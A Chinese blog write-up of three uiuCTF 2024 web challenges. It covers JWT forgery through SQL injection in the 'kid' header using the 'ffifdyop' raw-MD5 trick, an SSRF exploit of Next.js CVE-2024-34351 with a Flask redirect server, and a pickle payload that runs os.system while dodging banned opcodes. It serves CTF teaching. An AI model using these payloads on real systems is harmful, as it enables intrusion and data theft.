uiuCTF2024 Web方向 部分题解Writeup

最新推荐文章于 2024-07-03 09:00:00 发布
最新推荐文章于 2024-07-03 09:00:00 发布
阅读量783 收藏 10
点赞数 9
分类专栏: CTF赛事 文章标签: CTF Web安全 uiuCTF ts CVE-2024-34351 python opcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/140115244
版权

Fare Evasion

题目描述:SIGPwny Transit Authority needs your fares, but the system is acting a tad odd. We’ll let you sign your tickets this time!

SIGPwny交通管理局需要您的车费,但系统有点不正常。这次我们允许您签署您的票据!

开题

image-20240630045839181

两个按钮,只有左边的可以点击。右边的前端限制点击不了,这个好办,但是没有点击事件,也没有对应功能的函数。

点击左边按钮

Sorry passenger, only conductors are allowed right now. Please sign your own tickets. hashed _RòsÜxÉÄÅ´\ä secret: a_boring_passenger_signing_key_?

image-20240630045959140

前端找一下线索

源码:

image-20240630050122085

JWT:

image-20240630050136242

image-20240630050158744

密钥在之前提示给了a_boring_passenger_signing_key_?

到这里有两个思路,一个是前端暴露了SQL语句,我们考虑SQL注入。还有一个就是伪造JWT实现身份鉴别为conductors。事实上这题都用到了。

首先分析一下JWT,目前发现四种回显,初始状态下给了密钥等信息并且提示只有conductors管用,现在是passenger

image-20240630050523037

如果把密钥换掉,会提示我这个密钥不属于passengerconductors

image-20240630050658869

如果把JWT都删掉,会提示没有token

image-20240630050735454

如果破坏掉原有结构,会提示kid出了问题。

image-20240630050818183

重点来了,kid,回想一下前端披露的SQL语句,SELECT * FROM keys WHERE kid = '${md5(headerKid)}'

这边题目是md5之后进行kid校验的。kid有很多共计利用方式,其中不乏SQL注入(41.1)【JWT-KID漏洞】KID之目录遍历、命令注入、SQL注入_jwt kid-CSDN博客

但是这边进行了md5,不可以进行截断SQL语句阿啊啊啊。但是还是可以注入的,请看下文

ffifdyop的MD5加密结果是276f722736c95d99e921722cf9ed621c,经过MySQL编码后会变成’or’6xxx,相当于select * from ‘admin’ where password=''or 1,使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密。关键参数为md5(xx,true)。

这样我们在md5的情况下也可以进行万能密码共计了hhhhh。后端估计是在执行查找,我们的kid如果符合要求就可进入下一步了。

image-20240630051153125

果然,给了conductors的JWT密钥是conductor_key_873affdf8cc36a592ec790fc62973d55f4bf43b321bf1ccc0514063370356d5cddb4363b4786fd072d36a25e0ab60a78b8df01bd396c7a05cccbbb3733ae3f8e

image-20240630051217080

进行JWT伪造得到flag,内容不用伪造,换个密钥就行。后台好像是通过JWT密钥来鉴别身份

image-20240630051318088

image-20240630051325182

Log Action

题目描述:I keep trying to log in, but it’s not working 😢

给了附件,有源码。

是CVE-2024-34351,SSRF。

影响版本:13.4.0<= Next.js < 14.1.1

参考文章:

Next.js Server-Side Request Forgery in Server Actions · CVE-2024-34351 · GitHub Advisory Database · GitHub

在 NextJS 应用中挖掘 SSRF (assetnote.io)

CVE-2024-34351|Next.js框架存在SSRF漏洞-腾讯云开发者社区-腾讯云 (tencent.com)

开题:

image-20240702042841986

点击之后是登录,正如题目描述,登录不起作用。

image-20240702042911958

给了源码,我们先看一看。docker里面给出了flag的位置,看到这个就知道多半不是RCE拿flag了。

image-20240702043046823

ts源码整体看下来没什么明显漏洞点,登录部分用户名是admin,密码是每次随机的16位数,这意味着不可能正常登录,而且正常登录后admin路由也不给flag。

image-20240702044126433

引用一下外国老哥在wp中所阐述的观点: Log4J RCE(远程代码执行)漏洞,它让我意识到我们都使用的所有库和模块都可能存在潜在危险。

CVE-2024-34351简述一下就是由于Next.js代码漏洞引起的,,当我们调用服务器操作并响应重定向时,它会调用异步函数createRedirectRenderResult

在附件文件log-action\frontend\src\app\logout\page.tsx,确实用到了Next.js并且进行了路由跳转

image-20240702045039903

抓一下注销时候的包

image-20240702045159668

根据老哥的源代码分析,我们可以通过HOST头来控制跳转的,因为有检查 CSRF 攻击的防御手段,所以我们还需要同步更新Origin。服务器开启监听,收到请求!

image-20240702045714993

image-20240702045915007

OK到这里SSRF已经验证了,接下来就是重定向到内网拿flag。

接下来就是SSRF拿flag的事情了,直接跳到拿flag还是跨度挺大的,中间还有一些分析,感兴趣的话可以去看看国外老哥写的文章:Log Action | Siunam’s Website (siunam321.github.io)

在安装完docker,启动容器时,docker会为容器默认分配一个容器子网,一般为172.17.0.0/24

但是这里后端服务的内部IP地址是172.18.0.2

直接看利用,py脚本上传服务器,python起一个服务

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

exp.py

from flask import Flask, request, Response, redirect

app = Flask(__name__)

@app.route('/login')
def exploit():
    # CORS preflight check
    if request.method == 'HEAD':
        response = Response()
        response.headers['Content-Type'] = 'text/x-component'
        return response
    # after CORS preflight check
    elif request.method == 'GET':
        ssrfUrl = 'http://172.18.0.2/flag.txt'
        return redirect(ssrfUrl)
    
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1717, debug=True)

image-20240702053503440

image-20240702053633311

Push and Pickle

题目描述:I love how there are so many different types of pickles. I tried experimenting with two of them.

附件给了源码,ban了一些opcode

import pickle
import base64
import sys
import pickletools

def check_flag(flag_guess: str):
  """REDACTED FOR PRIVACY"""

cucumber = base64.b64decode(input("Give me your best pickle (base64 encoded) to taste! "))

for opcode, _, _ in pickletools.genops(cucumber):
  if opcode.code == "c" or opcode.code == "\x93":
    print("Eww! I can't eat dill pickles.")
    sys.exit(0)

pickle.loads(cucumber)

ban的不多,直接打

import base64
opcode=b'''(S'cat chal.py'\nios\nsystem\n.'''
print(base64.b64encode(opcode))

image-20240702042433496

getshell后拿不到flag,但是可以拿下完整源码,剩下的就是逆向的事情了。

import pickle
import base64
import sys
import pickletools

def check_flag(flag_guess: str):
  """REDACTED FOR PRIVACY"""

  # What?! How did you find this? Well you won't be able to figure it out from here...
  return pickle.loads(b'\x80\x04\x96+\x00\x00\x00\x00\x00\x00\x00lbp`sg~S:_p\x7fnf\x81yJ\x8bzP\x92\x95\x8cr\x88\x9d\x90\x8c\x7fb\x96\xa0\xa3\x9e\xae^\xa4s\xa5\xa6y}\xc8\x94\x8c'
                      + len(flag_guess).to_bytes(1, 'little')
                      + flag_guess.encode()
                      + b'\x94\x8c\x08builtins\x8c\x03all\x93\x94\x94\x8c\x08builtins\x8c\x04list\x93\x94\x94\x8c\x08builtins\x8c\x03map\x93\x94\x94\x8c\x05types\x8c\x08CodeType\x93\x94(K\x01K\x00K\x00K\x01K\x05KCC<|\x00d\x01\x19\x00t\x00t\x01\x83\x01k\x00o:|\x00d\x02\x19\x00t\x02t\x01|\x00d\x01\x19\x00\x19\x00\x83\x01d\x03|\x00d\x01\x19\x00d\x04\x17\x00\x14\x00\x17\x00d\x05\x16\x00k\x02S\x00(NK\x00K\x01K\x02KaK\xcbt\x8c\x03len\x8c\x01b\x8c\x03ord\x87\x8c\x01x\x85\x8c\x08<pickle>\x8c\x08<pickle>K\x07C\x00tR\x940\x8c\x05types\x8c\x0cFunctionType\x93\x94(h\t}(\x8c\x03len\x8c\x08builtins\x8c\x03len\x93\x94\x94\x8c\x01bh\x01\x8c\x03ord\x8c\x08builtins\x8c\x03ord\x93\x94\x94uN)tR\x8c\x08builtins\x8c\tenumerate\x93\x94\x94h\x00\x85R\x86R\x85R\x85R.')

def test_check_flag():
    flag_guess = "test_flag"
    result = check_flag(flag_guess)
    print("Result from check_flag:", result)

test_check_flag()
Jay 17
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
西普WEB部分题解
12-09
【标题】"西普WEB部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
2024年美赛E题解题思路分享篇
05-24
美赛(MCM/ICM)的E题通常涉及环境科学、能源、政策分析或社会科学等领域。这些题目往往要求参赛者运用数学建模和仿真技术,对复杂的环境、能源或社会问题进行分析和预测。
含有历年来天梯赛部分题解
03-05
每题上方为题目序号,代码为题解部分题解有另法
【CTF WriteUp】2020网鼎杯第一场部分题解
01-20
(好难啊~~~) Crypto boom 本地运行,过三关。第一关找个东西md5值等于给定值,破解一下得到en5oy;第二关解三元一次方程,得x=74, y=68, z=31;第三关解一元二次方程,找正数根x=89127561。全过得flag ...
西北工业大学 NOJ 部分难题题解
01-06
【标题】:“西北工业大学 NOJ 部分难题题解” 【内容详解】 “西北工业大学 NOJ(Northwest Polytechnic University Online Judge)部分难题题解”是一个专门为编程爱好者和学习者提供的资源,旨在帮助他们解决 ...
力扣第214题“最短回文串”
10年数据\经营分析经验,现任大厂数据分析负责人
06-28 1218
本文详细解读了力扣第214题“最短回文串”,通过使用 KMP 算法的方法高效地解决了这一问题,并提供了详细的解释和模拟面试问答。希望读者通过本文的学习,能够在力扣刷题的过程中更加得心应手。
使用Python实现深度学习模型:序列建模与生成模型的博客教程
Echo_Wish的博客
07-02 694
本文介绍了使用Python实现深度学习模型的序列建模和生成模型的步骤。我们详细说明了每个步骤,并提供了相应的代码示例。通过学习本文,您将能够使用Python构建和训练序列建模和生成模型,并生成新的序列数据。希望本文对您有所帮助!如果您有任何问题或建议,请随时提出。
PyTorch读写模型(state_dict、torch.save、torch.load)
酒酿小圆子呀~
06-30 432
在PyTorch中,state_dict 是一个简单的python的字典对象,将每一层与它的对应参数建立映射关系。(如model的每一层的weights及bias等)注意:只有具有可学习参数的层(卷积层、线性层等)才有state_dict中的条目。优化器(optim)也有一个state_dict,其中包含关于优化器状态以及所使用的超参数的信息。
JAVA中的异常超详解
2302_79993788的博客
07-01 771
通常使用java语言内置的异常类就可以描述在编写程序时出现的大部分情况,但是有些时候,程序员需要根据程序设计的需要来创建自己的异常类,用以描述java语言内置异常类所不能描述的一些特殊情况。下面就来介绍如何创建和如何自定义异常。自定义异常类必须继承自Throwable类,才能被视为异常类,通常是继承Throwable的子类Exception或者Exception类的子孙类。下面是一个实例来演示如何创建一个自定义异常类1、创建一个MYException异常类,它必须继承Exception类。
Java的异常处理体系
落日的博客
06-28 1226
ControllerAdvice 注解用于定义全局控制器建议,在 Spring MVC 中,控制器建议由控制器中的 @ExceptionHandler 方法、@InitBinder 方法和 @ModelAttribute 方法组成。①、CheckedException (检查异常 必须在代码中显式处理 使用try catch捕获 或者 在方法上使用 throws 抛出 除了RuntimeException及其子类以外,其他的Exception类及其子类都属于受检查异常 )
使用container_of宏进行类型转换
06-28 459
本文详细介绍了。
【知识图谱系列】Neo4j使用Py2neo与python进行链接
2301_81199775的博客
06-28 351
目录 一、安装py2neo 二、打开Neo4j 三、使用Python操作Neo4j 一、安装py2neo pip install --upgrade py2neo -i https://pypi.tuna.tsinghua.edu.cn/simple 可以先阅读下文档:https://py2neo.org/v4/index.html 这个文档里有好多关于这个工具包的API介绍,也就是如何使用这个工具包。 二、打开Neo4j 在cmd里输入neo4j.bat console,然
【乐器识别系统】图像识别+人工智能+深度学习+Python+TensorFlow+卷积神经网络+模型训练
子午的博客
06-30 458
乐器识别系统。
昇思25天学习打卡营第02天 | 快速入门
qq_31254435的博客
06-30 355
昇思25天学习打卡营第02天 | 快速入门
01.Ambari自定义服务开发-项目初始化
jast
06-27 348
我们可以从下面几个目录找到项目代码所在位置,下面两个位置中的。进入服务器压缩依赖,将依赖下载到本地。项目代码,不然会找不到依赖。可以看到我们虚拟环境的目录。至此项目基础环境搭建完成。需要用到ambari中的。到这里空项目创建完成。点击项目中右下角环境。
Python Tkinter手搓俄罗斯方块
最新发布
甜盐的博客
07-03 461
俄罗斯方块是一个经典的电子游戏,风靡全球。下面我们一步一步地使用Python和Tkinter库制作一个简易的俄罗斯方块游戏。
《每天5分钟用Flask搭建一个管理系统》第5章:表单处理
eclipsercp的博客
06-28 377
本章介绍了Web表单的基本概念,以及如何使用Flask-WTF扩展来处理表单验证和文件上传。
第十章 数字(Number)(Python)
时光会把你雕刻成,你应有的模样!
06-28 285
Python 数字数据类型用于存储数值。数据类型是不允许改变的,这就意味着如果改变数字数据类型的值,将重新分配内存空间。
softargmax pytorch 实现
huachenyuyu1的博客
07-01 155
表现好,和torch.argmax结果保持一致。这个会出现错误计算结果,没有第一个好。
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值